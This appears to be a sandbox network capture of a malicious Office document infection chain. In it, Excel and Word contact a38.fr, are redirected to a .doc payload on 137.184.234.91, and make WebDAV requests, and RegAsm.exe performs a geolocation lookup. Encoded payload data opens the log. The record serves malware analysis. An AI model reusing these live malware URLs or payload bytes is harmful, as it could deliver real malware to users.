                                                              Aug 28, 2024 14:00:50.525191069 CEST1236INData Raw: 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44
                                                              Data Ascii: nDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD7
                                                              Aug 28, 2024 14:00:50.525202990 CEST1236INData Raw: 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51 67
                                                              Data Ascii: wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gYN
                                                              Aug 28, 2024 14:00:50.525266886 CEST1236INData Raw: 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44
                                                              Data Ascii: kD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQODj
                                                              Aug 28, 2024 14:00:50.525279999 CEST1236INData Raw: 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75
                                                              Data Ascii: o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6UcO
                                                              Aug 28, 2024 14:00:50.525439978 CEST1236INData Raw: 74 7a 49 37 73 78 4f 51 73 7a 42 36 45 76 4f 62 72 44 6f 36 55 70 4f 4d 71 7a 57 36 4d 56 4f 47 6e 54 74 35 55 61 4f 64 6d 44 6a 35 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a
                                                              Data Ascii: tzI7sxOQszB6EvObrDo6UpOMqzW6MVOGnTt5UaOdmDj5wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP
                                                              Aug 28, 2024 14:00:50.525474072 CEST1236INData Raw: 77 39 4d 4c 50 54 71 7a 38 35 4d 53 4f 54 69 7a 38 32 4d 65 4e 54 4b 7a 41 79 4d 50 4d 7a 41 79 67 75 4d 58 4c 6a 6f 79 73 70 4d 75 4a 7a 5a 78 34 61 4d 79 45 6a 48 77 49 43 41 41 45 41 6b 41 51 41 67 41 41 41 41 2f 63 39 50 6e 2b 6a 64 2f 59 53
                                                              Data Ascii: w9MLPTqz85MSOTiz82MeNTKzAyMPMzAyguMXLjoyspMuJzZx4aMyEjHwICAAEAkAQAgAAAA/c9Pn+jd/YSPzxzS4kIOlUj+0MLNvSzq0cKNjSzn0sJNXKT4yQoMVFj6wcLMFCAAAgDAEAHAAAgP77D8+4QPk3ju90YP71zB8s0OzvTy7M6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP
                                                              Aug 28, 2024 14:00:50.525486946 CEST1236INData Raw: 52 44 51 30 77 44 4e 34 51 44 4e 30 41 7a 4d 6e 4f 44 4d 7a 77 79 4d 6f 4d 44 4a 7a 41 79 4d 63 4d 44 47 7a 51 68 4d 2f 4a 44 43 79 51 67 4d 41 45 44 2f 78 67 66 4d 30 48 44 38 78 77 65 4d 6a 42 41 41 41 51 47 41 44 41 4e 41 41 41 77 50 50 2f 54
                                                              Data Ascii: RDQ0wDN4QDN0AzMnODMzwyMoMDJzAyMcMDGzQhM/JDCyQgMAED/xgfM0HD8xweMjBAAAQGADANAAAwPP/Tv/s5PJ+Ta/QlP30je2gcNMND0zYiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ
                                                              Aug 28, 2024 14:00:50.530409098 CEST1236INData Raw: 55 42 50 52 7a 44 78 38 30 4c 50 33 79 54 73 38 41 4b 50 44 79 6a 62 38 67 47 50 67 78 7a 53 38 34 44 50 79 77 44 4a 37 38 66 4f 4e 6d 6a 68 35 6f 58 4f 69 68 6a 36 34 34 4e 4f 35 67 7a 4d 33 6f 39 4e 50 66 54 67 33 49 33 4e 73 64 44 5a 33 67 67
                                                              Data Ascii: UBPRzDx80LP3yTs8AKPDyjb8gGPgxzS84DPywDJ78fONmjh5oXOihj644NO5gzM3o9NPfTg3I3NsdDZ3ggNgbzW24iNpYDF18fNjXTz1UcN8Wzq1wANtTD20sMN7Sjp0MFNFRDH0kwMwPT1zU8M9ODpzo3MqNjYzo0MqMjCyktMBLjoycoMqJzSy4iMpIjFywgMCED/xcfMsHD5xwdMUHTzxYcM/GDuxEbMqGzox0ZMXGTkxsYM


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.2249179178.237.33.50803008C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              Aug 28, 2024 14:00:53.632468939 CEST71OUTGET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              Aug 28, 2024 14:00:55.204083920 CEST1170INHTTP/1.1 200 OK
                                                              date: Wed, 28 Aug 2024 12:00:54 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                              Aug 28, 2024 14:00:55.204149008 CEST1170INHTTP/1.1 200 OK
                                                              date: Wed, 28 Aug 2024 12:00:54 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                              Aug 28, 2024 14:00:55.204572916 CEST1170INHTTP/1.1 200 OK
                                                              date: Wed, 28 Aug 2024 12:00:54 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                              Aug 28, 2024 14:00:55.204727888 CEST1170INHTTP/1.1 200 OK
                                                              date: Wed, 28 Aug 2024 12:00:54 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.224916545.83.105.924433512C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:23 UTC319OUTGET /GQ1oBm HTTP/1.1
                                                              Accept: */*
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                              Host: a38.fr
                                                              Connection: Keep-Alive
                                                              2024-08-28 12:00:23 UTC619INHTTP/1.1 302 Found
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:23 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 192
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Location: http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc
                                                              Vary: Accept
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: same-origin
                                                              2024-08-28 12:00:23 UTC192INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 33 37 2e 31 38 34 2e 32 33 34 2e 39 31 2f 37 37 2f 63 6e 2f 77 65 6e 65 65 64 6e 65 77 74 68 69 6e 67 73 74 6f 67 65 74 6d 65 67 72 65 61 74 74 68 69 6e 67 73 62 75 74 74 65 72 73 6d 6f 6f 74 68 63 68 6f 63 6f 6c 61 74 65 63 75 72 6e 63 68 69 77 61 66 65 72 77 69 74 68 6e 69 63 65 62 69 73 63 75 74 77 69 74 68 65 6e 74 69 72 65 74 68 69 6e 67 73 74 6f 62 65 67 65 74 6d 65 62 61 63 6b 5f 5f 5f 5f 5f 5f 5f 5f 6e 65 77 62 75 74 74 65 72 73 6d 6f 6f 74 68 62 75 74 74 65 72 2e 64 6f 63
                                                              Data Ascii: Found. Redirecting to http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.224916745.83.105.924433784C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:25 UTC128OUTOPTIONS / HTTP/1.1
                                                              User-Agent: Microsoft Office Protocol Discovery
                                                              Host: a38.fr
                                                              Content-Length: 0
                                                              Connection: Keep-Alive
                                                              2024-08-28 12:00:25 UTC475INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:25 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 8
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Allow: GET,HEAD
                                                              ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: same-origin
                                                              2024-08-28 12:00:25 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                              Data Ascii: GET,HEAD


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.224916845.83.105.924433784C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:29 UTC113OUTHEAD /GQ1oBm HTTP/1.1
                                                              Connection: Keep-Alive
                                                              User-Agent: Microsoft Office Existence Discovery
                                                              Host: a38.fr
                                                              2024-08-28 12:00:29 UTC619INHTTP/1.1 302 Found
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:29 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 192
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Location: http://137.184.234.91/77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc
                                                              Vary: Accept
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: same-origin


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              3192.168.2.224916945.83.105.92443
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:35 UTC123OUTOPTIONS / HTTP/1.1
                                                              Connection: Keep-Alive
                                                              User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                              translate: f
                                                              Host: a38.fr
                                                              2024-08-28 12:00:35 UTC475INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:35 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 8
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Allow: GET,HEAD
                                                              ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-XSS-Protection: 1; mode=block
                                                              X-Download-Options: noopen
                                                              X-Content-Type-Options: nosniff
                                                              X-Permitted-Cross-Domain-Policies: none
                                                              Referrer-Policy: same-origin
                                                              2024-08-28 12:00:35 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                              Data Ascii: GET,HEAD


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              4192.168.2.224917045.83.105.92443
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:36 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 33 38 2e 66 72 0d 0a 0d 0a
                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: a38.fr
                                                              2024-08-28 12:00:37 UTC261INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:36 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 144
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: default-src 'none'
                                                              2024-08-28 12:00:37 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              5192.168.2.224917145.83.105.92443
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-28 12:00:37 UTC153OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 33 38 2e 66 72 0d 0a 0d 0a
                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: a38.fr
                                                              2024-08-28 12:00:39 UTC261INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 28 Aug 2024 12:00:38 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 144
                                                              Connection: close
                                                              X-DNS-Prefetch-Control: off
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: default-src 'none'
